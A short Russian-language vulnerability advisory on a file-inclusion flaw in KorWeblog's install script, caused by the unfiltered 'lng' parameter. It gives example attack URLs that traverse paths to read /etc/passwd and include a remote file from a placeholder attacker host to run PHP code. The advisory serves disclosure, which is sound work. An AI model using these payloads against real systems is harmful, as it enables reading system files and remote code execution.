• Партнер

  • Программа: KorWeblog 1.6.2-cvs и более ранние версии

    Обнаружена уязвимость в KorWeblog. Удаленный атакующий может выполнить произвольные команды на уязвимой системе.
    Уязвимость обнаружена в сценарии '/install/index.php' из-за некорректной фильтрации входных данных в параметре 'lng'. Удаленный атакующий может создать специально сформированный URL и выполнить произвольный php сценарий на уязвимой системе с привилегиями web сервера. Примеры:

    http://[target]/weblog/install/index.php?lng=../../../../../../etc/passwd%00

    http://[target]/weblog/install /index.php?lng=../../phpinfo

    http://[target]/weblog/install/index.php?lng=../../include/main.inc&G_PATH=http://[attacker]

    Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии